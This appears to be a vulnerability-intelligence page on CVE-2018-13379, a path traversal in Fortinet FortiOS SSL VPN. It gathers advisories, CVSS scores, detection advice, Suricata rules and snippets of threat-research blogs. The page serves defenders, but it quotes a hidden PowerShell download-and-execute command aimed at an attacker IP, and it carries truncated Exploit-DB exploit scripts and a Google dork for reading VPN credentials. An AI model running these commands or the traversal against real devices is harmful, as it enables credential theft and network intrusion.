CVE-2018-13379
published 2019-06-04CVE-2018-13379: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
100.00%
100.0th percentile
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortinet | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | >= 5.4.6 < 5.4.13 | 5.4.13 |
| fortinet | fortios | >= 5.6.3 < 5.6.8 | 5.6.8 |
| fortinet | fortios | >= 6.0.0 < 6.0.5 | 6.0.5 |
| fortinet | fortiproxy | < 1.2.9 | 1.2.9 |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"↗
- →CVE-2018-13379 exploitation involves specially crafted HTTP resource requests to the FortiOS SSL VPN web portal to download system files without authentication — monitor for anomalous GET requests to SSL VPN portal paths containing path traversal sequences (e.g., '../') from unauthenticated sources. ↗
- →APT29 exploited CVE-2018-13379 for FortiGate VPN initial access; hunt for unexpected VPN logins from new or dormant accounts following FortiGate access log anomalies. ↗
- →CVE-2018-13379 is among the most repeatedly exploited CVEs by ransomware actors for initial access; prioritize detection of path traversal attempts against FortiOS SSL VPN web portal endpoints. ↗
- →After CVE-2018-13379 exploitation, validate all SSL-VPN local users for expected accounts and correct email addresses; unrecognized local users may indicate post-exploitation persistence. ↗
- →Play ransomware ransom notes contain email addresses in the format [seven random characters]@gmx[.]com — use this pattern to identify Play ransomware infections in email/file system forensics. ↗
- ·CVE-2018-13379 affects FortiOS 6.0.0–6.0.4, 5.6.3–5.6.7, and 5.4.6–5.4.12, and FortiProxy 2.0.0, 1.2.0–1.2.8, 1.1.0–1.1.6, and 1.0.0–1.0.7. Detection and mitigation efforts should confirm the exact affected version range before applying. ↗
- ·Fortinet patched CVE-2018-13379 in May 2019 (FG-IR-18-384); systems not upgraded to patched firmware remain vulnerable. Mitigations were provided for those unable to upgrade at the time of disclosure. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck9.1CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2018-13379 [CRITICAL] CWE-22 Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Vulnerability: Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Affected: Fortinet FortiOS
Fortinet FortiOS SSL VPN web portal contains a path traversal vulnerability that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-13379
Remediation Due Date: 2022-05-03
Fortinet
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
vendor_fortinet·2019-06-04·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
FG-IR-18-384: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
CVEs: CVE-2018-13379
CWEs: CWE-22
CVSS: 9.1 (critical)
Affected products: FortiOS, FortiProxy, Fortinet
Fortinet
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
vendor_fortinet·2019-06-04·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
FG-IR-20-233: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
CVEs: CVE-2018-13379
CWEs: CWE-22
CVSS: 9.1 (critical)
Affected products: FortiOS, FortiProxy, Fortinet
GHSA
GHSA-2q79-m25p-r2q3: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6
ghsa_unreviewed·2022-05-24
CVE-2018-13379 [MEDIUM] CWE-22 GHSA-2q79-m25p-r2q3: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
VulnCheck
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
vulncheck·2018·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN web portal contains a path traversal vulnerability that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf; https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-13379; https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF;
Suricata
ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)
suricata·2021-09-22·CVSS 9.1
CVE-2018-13379 [CRITICAL] ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)
ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fgt_lang?lang="; fast_pattern; content:"|2e 2e 2f|"; distance:0; reference:url,devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/; reference:url,github.com/milo2012/CVE-2018-13379/blob/master/CVE-2018-13379.py; reference:cve,2018-13379; classtype:attempted-admin; sid:2034005; rev:1; metadata:affected_product Fortigate, created_at 2021_09_22, cve CVE_2018_13379, deployment Perimeter, deployment Internal, confidence High, signature_severity Maj
Suricata
ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)
suricata·2019-08-14·CVSS 9.1
CVE-2018-13379 [CRITICAL] ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)
ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/remote/fgt_lang?lang=/../"; depth:35; isdataat:30,relative; fast_pattern; reference:cve,CVE-2018-13379; reference:url,blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html; classtype:attempted-admin; sid:2027883; rev:3; metadata:affected_product Fortigate, attack_target Networking_Equipment, created_at 2019_08_14, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, signature_severity Major, tag CISA_KEV, updated_at 2020_08_31, mitre_tactic_id TA0007, mitre_tactic_name Disco
Exploit-DB
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
exploitdb·2019-08-19·CVSS 9.1
CVE-2018-13379 [CRITICAL] Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
---
# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
require 'msf/core'
class MetasploitModule 'SSL VPN FortiOs - System file leak',
'Description' => %q{
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file
Exploit-DB
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
exploitdb·2019-08-19·CVSS 9.1
CVE-2018-13379 [CRITICAL] Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
---
# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()
def leak(host, port):
print("[!] Leak information...")
try:
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..///////
Nuclei
Fortinet FortiOS - Credentials Disclosure
nuclei·CVSS 9.8
CVE-2018-13379 [CRITICAL] Fortinet FortiOS - Credentials Disclosure
Fortinet FortiOS - Credentials Disclosure
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
Template:
id: CVE-2018-13379
info:
name: Fortinet FortiOS - Credentials Disclosure
author: organiccrap
severity: critical
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
blogs_qualys·2025-05-08
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
## Table of Contents
Who is LockBit? How it Evolved and Operates
Monero: The Coin of the Realm
Patch or Mitigate Now: Critical CVEs Exploited by LockBit
Beyond Traditional Endpoints: Other Compromised Systems
Initial Access and Deployment
Conclusion
The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table with 59,975 unique bitcoin addresses and a ‘chats’ table containing over 4,400 victim negotiation messages from December 2024 to the end of April 2025.
This blog post will leverage
Tenable
Cybersecurity Snapshot: Ghost Ransomware Group Targets Known Vulns, CISA Warns, While Report Finds Many Cyber Pros Want To Switch Jobs
blogs_tenable·2025-02-21
Cybersecurity Snapshot: Ghost Ransomware Group Targets Known Vulns, CISA Warns, While Report Finds Many Cyber Pros Want To Switch Jobs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
CISA and FBI: Ghost ransomware breached orgs in 70 countries
blogs_bleepingcomputer·2025-02-19·CVSS 6.5
[MEDIUM] CISA and FBI: Ghost ransomware breached orgs in 70 countries
## CISA and FBI: Ghost ransomware breached orgs in 70 countries
## Sergiu Gatlan
CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations.
Other industries impacted include healthcare, government, education, technology, manufacturing, and numerous small and medium-sized businesses.
"Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware," CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory released on Wednesday.
"This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizatio
Fortinet
Analysis of Threat Actor Data Posting | Fortinet Blog
blogs_fortinet·2025-01-16
Analysis of Threat Actor Data Posting | Fortinet Blog
PSIRT BLOGS
Analysis of Threat Actor Data Posting
By Carl Windsor | January 16, 2025
Affected Platforms: FortiOS 7.0.0 – 7.0.6 and 7.2.0 – 7.2.1
Impacted Users: Various
Impact: Configuration and VPN Password Exposure
Severity Level: High
Executive Summary
Fortinet is aware of a posting by a threat actor which claims to offer compromised configuration and VPN credentials from FortiGate devices. Based on our analysis, the data involved is a resharing of data from previous incidents from dates prior to November 2022 and is not related to any recent incident or advisory. The following provides factual information to help our customers better understand the situation and make informed decisions.
Threat Actor Posting
Fortinet discovered the posting on a forum via the FortiRecon Dark Web Ac
Bleepingcomputer
Hackers leak configs and VPN credentials for 15,000 FortiGate devices
blogs_bleepingcomputer·2025-01-15
Hackers leak configs and VPN credentials for 15,000 FortiGate devices
## Hackers leak configs and VPN credentials for 15,000 FortiGate devices
## Lawrence Abrams
A new hacking group has leaked the configuration files, IP addresses, and VPN credentials for over 15,000 FortiGate devices for free on the dark web, exposing a great deal of sensitive technical information to other cybercriminals.
The data was leaked by the "Belsen Group," a new hacking group first appearing on social media and cybercrime forums this month. To promote themselves, the Belsen Group has created a Tor website where they released the FortiGate data dump for free to be used by other threat actors.
"At the beginning of the year, and as a positive start for us, and in order to solidify the name of our group in your memory, we are proud to announce our first official operation: Will be
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now
blogs_greynoiseio·2024-10-17
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Unit42
Ransomware Review: First Half of 2024
blogs_unit42·2024-08-09·CVSS 9.1
CVE-2018-13379 [CRITICAL] Ransomware Review: First Half of 2024
Threat Research Center
Trend Reports
Ransomware
## Ransomware Review: First Half of 2024
Amanda Tanner
Kristopher Bleich
Published: August 9, 2024
Cybercrime
Ransomware
Trend Reports
Alpha
ALPHV
Ambitious Scorpius
Anemic Scorpius
AvosLocker
Bashful Scorpius
Black Basta
Blackcat
Blackout
BreachForums
Burning Scorpius
Buzzing Scorpius
Chubby Scorpius
CL0P
CVE-2018-13379
CVE-2020-1472
CVE-2024-1708
CVE-2024-1709
CVE-2024-26169
CVE-2024-27198
CVE-2024-4577
Dark Scorpius
DoNex
DragonForce
Drowsy Scorpius
Flighty Scorpius
GhostSec
Healthcare
Hive
Hunters International
Ignoble Scorpius
Karakurt
KelvinSecurity
Leak site
LockBit
Losttrust
LukaLocker
Manufacturing
Muddled Libra
Mushy Scorpius
MyData
NoEscape
Nokoyawa
Qilin
Quilong
Ragnar Locke
Unit42
Ransomware Review: First Half of 2024
blogs_unit42·2024-08-09
Ransomware Review: First Half of 2024
## Executive Summary
Unit 42 monitors ransomware and extortion leak sites closely to keep tabs on threat activity. We reviewed compromise announcements from 53 dedicated leak sites in the first half of 2024 and found 1,762 new posts. This averages to approximately 294 posts a month and almost 68 posts a week. Of the 53 ransomware groups whose leak sites we monitored, six of the groups accounted for more than half of the compromises observed.
In February, we reported a 49% increase year-over-year in alleged victims posted on ransomware leak sites. So far, in 2024, comparing the first half of 2023 to the first half of 2024, we see an even further increase of 4.3%. The higher level of activity observed in 2023 was no fluke.
Activity from groups like Ambitious Scorpius (distributors of Blac
Talos
Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
blogs_talos·2024-07-10
Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
Given the recent slate of massive ransomware attacks that have disrupted everything from hospitals to car dealerships, Cisco Talos wanted to take a renewed look at the top ransomware players to see where the current landscape stands.
Based on a comprehensive review of more than a dozen prominent ransomware groups, we identified several commonalities in tactics, techniques and procedures (TTPs), along with several notable differences and outliers.
Talos’ studies indicate that the most prolific ransomware actors prioritize gaining initial access to targeted networks, with valid accounts being the most common mechanism. Phishing for credentials often precedes these attacks, a trend observed across all incident response engagements, consistent with our 2023 Year in Review report. Over the pa
Talos
Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
blogs_talos·2024-07-10
Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
## Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
Given the recent slate of massive ransomware attacks that have disrupted everything from hospitals to car dealerships , Cisco Talos wanted to take a renewed look at the top ransomware players to see where the current landscape stands.
Based on a comprehensive review of more than a dozen prominent ransomware groups, we identified several commonalities in tactics, techniques and procedures (TTPs), along with several notable differences and outliers.
Talos’ studies indicate that the most prolific ransomware actors prioritize gaining initial access to targeted networks, with valid accounts being the most common mechanism. Phishing for credentials often precedes these attacks, a trend observed across all incid
Trendmicro
LockBit unter der Lupe
blogs_trendmicro·2024-06-04
LockBit unter der Lupe
Ransomware
## LockBit unter der Lupe
Angesichts der leistungsstarken Malware-Fähigkeiten und des mächtigen Affiliate-Programms von LockBit sollten sich Unternehmen über die Aktivitäten der Gruppe auf dem Laufenden halten, um Risiken effektiv zu erkennen und Angriffe abzuwehren.
By: Trend Micro Jun 04, 2024 Read time: ( words)
Save to Folio
Am 19. Februar 2024 sorgte die Operation Cronos, eine gezielte Strafverfolgungsmaßnahme, für eine Unterbrechung der Geschäftstätigkeit der berüchtigten Ransomware-Gruppe auf den mit LockBit verbundenen Plattformen. Die Behörden nutzten die kompromittierte LockBit-Leak-Site, um Informationen über die Gruppe und ihre Operationen zu verbreiten und Verhaftungen, Sanktionen, die Beschlagnahme von Kryptowährungen und mehr anzukündigen. Als einer der priva
Fortinet
Proactive, Responsible Disclosure Is One Crucial Way Fortinet Strengthens Customer Security | Fortinet
blogs_fortinet·2024-05-03
Proactive, Responsible Disclosure Is One Crucial Way Fortinet Strengthens Customer Security | Fortinet
PSIRT BLOGS
Proactive, Responsible Disclosure Is One Crucial Way Fortinet Strengthens Customer Security
By Carl Windsor | May 03, 2024
The cybersecurity industry continues to grow and mature. As a part of this process, we must collectively raise the topic of—and discuss the need for—ethical rules for handling the disclosure of vulnerabilities, especially given the many benefits of providing such intelligence in protecting customers against cyber adversaries. Nearly all vulnerabilities that cybercriminals target today can be traced back to software coding errors. Knowing about them before they can be exploited is vital in helping organizations protect their devices, businesses, and customers.
As a driving force in the evolution of cybersecurity, we are committed to being a role model in
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
[CRITICAL] CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
blogs_tenable·2024-01-10·CVSS 8.2
[HIGH] CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
blogs_talos·2023-10-11·CVSS 9.1
CVE-2023-36563 [CRITICAL] Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
Microsoft disclosed 104 vulnerabilities in its extensive range of software and services, the most in a single Patch Tuesday since July.
What is most notable is that this batch of vulnerabilities includes 12 that are considered “critical,” nine of which are remote code execution vulnerabilities in the Layer 2 Tunneling Protocol.
Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available, making it more likely that attackers will try to exploit unpatched versions of these pieces of software. However, these issues are only considered “important.”
The nine Layer 2 Tunneling Protocol vulnerabilities all requir
Talos
Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
blogs_talos·2023-10-11·CVSS 9.1
[CRITICAL] Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
## Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
Microsoft disclosed 104 vulnerabilities in its extensive range of software and services, the most in a single Patch Tuesday since July.
What is most notable is that this batch of vulnerabilities includes 12 that are considered “critical,” nine of which are remote code execution vulnerabilities in the Layer 2 Tunneling Protocol.
Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available, making it more likely that attackers will try to exploit unpatched versions of these pieces of software. However, these issu
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
#### Table of Contents
- References
- Additional Contributor
